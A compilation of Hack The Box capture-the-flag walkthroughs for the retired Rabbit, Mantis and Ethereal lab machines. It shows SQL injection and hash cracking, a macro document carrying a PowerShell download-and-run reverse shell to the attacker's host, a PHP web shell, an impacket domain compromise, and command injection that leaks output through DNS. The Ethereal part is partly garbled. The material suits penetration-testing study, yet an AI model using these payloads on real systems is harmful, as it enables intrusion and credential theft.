HTB – Rabbit

Today we are going to solve another CTF challenge “Rabbit” which is categories as retired lab presented by Hack the Box for making online penetration practices.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Rabbit is is 10.10.10.71 so let’s start with  a basic nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.71
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-13 15:54 W. Europe Summer Time
Nmap scan report for 10.10.10.71
Host is up (0.032s latency).
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:36+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-13 18:55:06Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:33+00:00; +5h00m01s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:34+00:00; +5h00m01s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h00m01s, deviation: 0s, median: 5h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.84 seconds
Let’s enumerate the web server with Gobuster:
root@kali:~/htb/rabbit# gobuster -e -k -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.71:8080/
[+] Threads : 20
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded : true
[+] Timeout : 10s
=====================================================
2019/05/13 10:30:07 Starting gobuster
=====================================================
http://10.10.10.71:8080/index (Status: 200)
http://10.10.10.71:8080/Index (Status: 200)
http://10.10.10.71:8080/favicon (Status: 200)
http://10.10.10.71:8080/%!(NOVERB) (Status: 403)
http://10.10.10.71:8080/INDEX (Status: 200)
http://10.10.10.71:8080/joomla (Status: 301)
http://10.10.10.71:8080/*checkout* (Status: 403)
http://10.10.10.71:8080/complain (Status: 301)

We found a Complain Management System



root@kali:~/htb/rabbit# searchsploit 'complain management system'
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Complain Management System - Hard-Coded Credentials / Blind SQL injection | exploits/php/webapps/42968.txt
Complain Management System - SQL injection | exploits/php/webapps/41131.txt
root@kali:~/htb/rabbit# cat /usr/share/exploitdb/exploits/php/webapps/42968.txt 
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec 
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files


## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;

Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.

As we read, the first thing will be to register as ‘ Customer ‘ and with the cookie PHPSESSID + sqlmap get access to the databases.

.

c:\SQLMAP>type rabbit.req
POST /complain/process.php?action=assignComplain HTTP/1.1
Host: 10.10.10.71:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.71:8080/complain/view.php?mod=admin&view=viewByCompID&compId=10
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Connection: close
Cookie: PHPSESSID=82k6csju4c0ccdepcbnan5k602
Upgrade-Insecure-Requests: 1

compId=10&compDesc=&engId=6&btnLogin=+Assing+Complain+
c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r rabbit.req --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:49 /2019-05-15/

[15:16:49] [INFO] parsing HTTP request from 'rabbit.req'
[15:16:49] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[15:16:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:16:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:16:50] [INFO] testing if the target URL content is stable
[15:16:51] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL')
[15:16:51] [INFO] testing for SQL injection on POST parameter 'compId'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
--snip--
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[15:18:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'c:\SQLMAP\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[15:18:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[15:18:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:18:21] [INFO] starting 4 processes
[15:18:2515:18:25] [] [INFOINFO] cracked password '] current status: 15091... /barcelona' for user 'Malek'
[15:18:31] [INFO] cracked password 'popcorn' for user 'Dumah'
[15:18:32] [INFO] cracked password 'santiago' for user 'Moebius'
[15:18:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel'
Database: secret
Table: users
[10 entries]
+----------+--------------------------------------------------+
| Username | Password |
+----------+--------------------------------------------------+
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Dumah | 33da7a40473c1637f1a2e142f4925194 (popcorn) |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 (santiago) |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 (barcelona) |
+----------+--------------------------------------------------+

[15:19:04] [INFO] table 'secret.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.71\dump\secret\users.csv'
[15:19:04] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.10.71'

[*] ending @ 15:19:04 /2019-05-15/

Exploitation

Where do we use these obtained credentials now? Let’s try in
https://10.10.10.71/owa

We use found  valid credentials:

Ariel:pussycatdolls

Once we have entered to the /owa the first thing will be to check the mails:

As we read in these emails, we could use a malicious Open Office to get shell but considering the PowerShell constraint and the Windows Defender
In metasploit there’s an exploit that could work:

exploit/multi/misc/openoffice_document_macro

We rename the file obtained to zip and edit the file replacing the payload by:

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd
Because of the PowerShell constraint we must use the -version 2 option:
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

Send an email to all, containing our malicious .odt file:

Two years later, the answer to resolving headaches with attachments in Outlook Web Access (OWA) remains unchanged: Use Internet Explorer, not Edge, not Chrome, not Firefox.

And now we wait for it to be executed by an user. (This will take appprox 7 minutes, if it doesn’t after 10 reset the box.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
C:\Users\jacco>nc -lvp 1234
listening on [any] 1234 ...
10.10.10.71: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.71] 20231: NO_DATA
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>whoami
whoami
htb\raziel

c:\Users\Raziel\Desktop>type user.txt
type user.txt
c6f*****e9c

Post-Exploitation

c:\>dir wamp64
dir wamp64
Volume in drive C has no label.
Volume Serial Number is AEA8-5415

Directory of c:\wamp64

10/28/2017 11:13 AM <DIR> .
10/28/2017 11:13 AM <DIR> ..
10/28/2017 12:19 PM <DIR> alias
10/28/2017 11:13 AM <DIR> apps
12/31/2010 09:39 AM 4,790 barimage.bmp
10/28/2017 11:15 AM <DIR> bin
10/28/2017 11:13 AM <DIR> cgi-bin
01/08/2017 10:13 AM 28,470 images_off.bmp
01/08/2017 10:13 AM 28,470 images_on.bmp
09/01/2017 04:30 PM 3,978 install-english.txt
10/28/2017 11:13 AM <DIR> lang
11/06/2015 11:00 AM 8,156 license-english.txt
10/28/2017 11:18 AM <DIR> logs
09/01/2017 09:44 AM 5,741 mariadb_support_en.txt
09/01/2017 04:20 PM 1,289 read_after_install-english.txt
10/28/2017 11:13 AM <DIR> scripts
05/13/2019 12:44 PM <DIR> tmp
10/28/2017 11:16 AM 4,038,372 unins000.dat
10/28/2017 11:13 AM 1,401,105 unins000.exe
10/28/2017 11:13 AM 185 uninstall_services.bat
10/29/2017 10:32 PM 2,086 wampmanager.conf
09/03/2008 03:46 PM 1,233,408 wampmanager.exe
11/16/2017 07:57 PM 546,316 wampmanager.ini
08/30/2017 09:28 AM 29,431 wampmanager.tpl
05/13/2019 01:56 PM <DIR> www
14 File(s) 7,331,797 bytes
11 Dir(s) 25,699,479,552 bytes free

c:\>

We see that the Web service of port 8080 is served by Wamp64. Sometimes this service is run as system.
Let’s see if we have write permissions and who’s running it:

c:\>cacls wamp64
cacls wamp64
c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA

CREATOR OWNER:(OI)(CI)(IO)(ID)F

c:\>

Let’s upload a php webshell:

c:\Python37>type puckie.php
  <?php echo shell_exec($_GET["cmd"]); ?>
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
10.10.10.71 - - [13/May/2019 14:57:26] "GET /puckie.php HTTP/1.1" 200 -
c:\Users\Raziel\Desktop>certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
**** Online ****
0000 ...
002c
CertUtil: -URLCache command completed successfully.
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=whoami
  nt authority\system
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=type%20c:\users\administrator\desktop\root.txt
0b2*****d54

Now we can read the flag and even get shell as System easily.

Author: Jacco Straathof

Reference used : https://ironhackers.es/en/writeups/writeup-rabbit-hackthebox/

HTB – Mantis

Today we are going to solve another CTF challenge “Mantis” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of Penetration testing. Let start and learn how to analyze any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Mantis is 10.10.10.52 so let’s initiate with nmap port enumeration.

root@kali# nmap -sC -sV -oA nmap 10.10.10.52
# Nmap 7.70 scan initiated Tue May 7 13:08:49 2019 as: nmap -sC -sV -oA nmap 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.032s latency).
Not shown: 980 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-07 17:09:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-05-05T21:17:25
|_Not valid after: 2049-05-05T21:17:25
|_ssl-date: 2019-05-07T17:10:12+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 48m02s, deviation: 1h47m21s, median: 1s
| ms-sql-info: 
| 10.10.10.52:1433: 
| Version: 
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery: 
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2019-05-07T13:10:15-04:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2019-05-07 13:10:12
|_ start_date: 2019-05-05 17:15:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 13:11:40 2019 -- 1 IP address (1 host up) scanned in 170.33 seconds

From the given below image, you can observe we found so many ports are open in the victim’s network.

First of all, we browse target IP through port 1337 in our web browser and saw following the image of IIS7 and although here I didn’t get any clue for next step therefore automatically next I move for directory buster.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on //10.10.10.52:1337

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 -o gobuster-mantis.log

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.52:1337/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/08 06:22:22 Starting gobuster
=====================================================
/secure_notes (Status: 301)

As result, I found a directory /secure notes

Here I saw two files dev_notes and web.config among these I’m interested in dev_notes test file to let’s open it.

When I open a dev_notes text file I read following contents as shown in below image and realize that it points towards a database “orcharddb” have “admin” as username, now I only need to know the required password for login into the database.

To me, the file “/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt” was looking suspicious as “NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx” was base 64 encoded, therefore, I need to decode this text for the correct assumption of getting the password.

root@kali:~/htb/mantis# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt contains some base64-encoded text.

root@kali:~/htb/mantis# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421

This looks like a hex string. Let’s convert it to ASCII:

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!

After decoding the above hex text finally I found a password for admin user.

Using mssqlclient.py we are going to connect to ms SQL server . Now let login into the database using database name and above-found credential via port 1433

root@kali:~/htb/mantis# ./mssqlclient.py htb.local/admin@10.10.10.52
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: m$$ql_S@_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> select @@version
Microsoft SQL Server 2014 - 12.0.2000.8 (X64) 
Feb 20 2014 20:04:26 
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
SQL> SELECT name FROM master..sysdatabases
master 
tempdb 
model 
msdb 
orcharddb 
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id 
UserName 
Email 
NormalizedUserName 
Password 
PasswordFormat 
HashAlgorithm 
PasswordSalt 
RegistrationStatus 
EmailStatus 
EmailChallengeToken 
CreatedUtc 
LastLoginUtc 
LastLogoutUtc 
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin 
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== 
James 
J@m3s_P@ssW0rd! 
SQL>

We had manually added target IP with htb.local and matis.htb.local the domain names which we have found through nmap in our local host file.

Then we have installed impacket from git hub as given below command.

git clone https://github.com/CoreSecurity/impacket.git

Impacket contains goldenpac python file which is used for post exploitation, now execute given below command and access the victim’s terminal.

root@kali:~/htb/mantis# goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: J@m3s_P@ssW0rd!
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wGWklYmG.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service AgUh on mantis.htb.local.....
[*] Starting service AgUh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\Users\james\Desktop>type user.txt
8a8*****54d

c:\Users\Administrator\Desktop>type root.txt
209*****567

Author: Jacco Straathof

HTB – Ethereal

Today we are going to solve another CTF challenge “Ethereal”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Insane

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.106.

Walkthrough

Let’s start off with scanning the network to find our target.

root@kali:~/htb/ethereal# nmap -sC -sV -oA nmap 10.10.10.106
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 13:49 EDT
Nmap scan report for ethereal.htb (10.10.10.106)
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=ethereal.htb
| http-server-header: 
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.80 seconds

. 1. Use the anonymous account Anonymous login, you can find the FDISK.zip compressed file, switch the transfer mode to binary before downloading, otherwise it is often because Network factor causes download failure

root@kali:~/htb/ethereal# wget --no-passive-ftp -m ftp://anonymous:anonymous@10.10.10.106
Ftp server

2. Unzip FDISK.zip and get an image file. After identifying with the file command, it was found to be a disk in FAT format. Use mount -t vfat /root/FDISK /mnt/htbdisk to mount the disk and extract the two files pbox.dat and pbox.exe. Install the xp virtual machine and double-click to run pbox.exe and find that this is a 16-bit application and cannot run directly.

Pbox.exe

win32.16-bit program simulator is very easy to find, DosBox is currently the most famous one, many arcade games can run, such as Prince of Persia, tank wars,enter pbox first hanging

4. This may be a version compatibility issue. Fortunately, DosBox (apt-get install dosbox) can be installed in the kali environment, but due to the Dos protection mode, a similar < no DPMI – Get csdpmi*b.zip may be reported. > error. Solution can refer to: https://www.linuxtopia.org/online_books/linux_tool_guides/the_sed_faq/sedfaq5_004.html The core of solving the problem is to download CWSDPMI.EXE and then throw it into the pbox.exe directory, you can run pbox.exe normally.

5. The password entered is password. After entering, it is a database. You can see the related content by clicking the corresponding table item, from which you can export a bunch of user name and password. The valid combination is:

user: alan
password: !C414m17y57r1k3s4g41n!

Pbox database

6. The obtained username and password can be used to log in to port 8080. This is a Test Connection page. According to the Ping Address prompt, it is not difficult to think of this as a command injection vulnerability.

8080 port login

7. The problem that needs to be solved is how to view the echo. In the Linux environment, the ping-p is commonly used, but the ping command of windows does not have the -p option, so the only thing that can be used is the nslookup command, which is combined with the tokens parameter. The result of the command, you also need to use the for loop of the cmd script to feedback the results, for example, I need to look at the second line of netstat -ano results, that is, all ip and port results, the command entered in the web is:

127.0.0.1 | for / f "tokens=2" %I in ('netstat -ano') do nslookup %I 10.10.8.20

About the for /f script loop body can be seen https://www.youtube.com/watch?v=jMS6LkMdAHI
need Note that the tokens parameter can be cascaded. For example, I want to see the 1 to 6 lines of the result. I only need to add tokens=1, 2, 3, 4, 5, 6 and the corresponding placeholder %a.%b.%c. %d.%e.%f can be as follows:
127.0.0.1 | for /f “tokens=1,2,3,4,5,6” %a in (‘type c:\xxxxx.txt’) do nslookup %a.%b.%c.%d.%e.%f 10.10.8.8
After executing command injection on the web, it is possible to start tcpdump or wireshark. Filter dns to see the command echo: (below) Running tasklist because nslookup is failing It performs 2 queries, so the results will be repeated)

Wireshark capture results

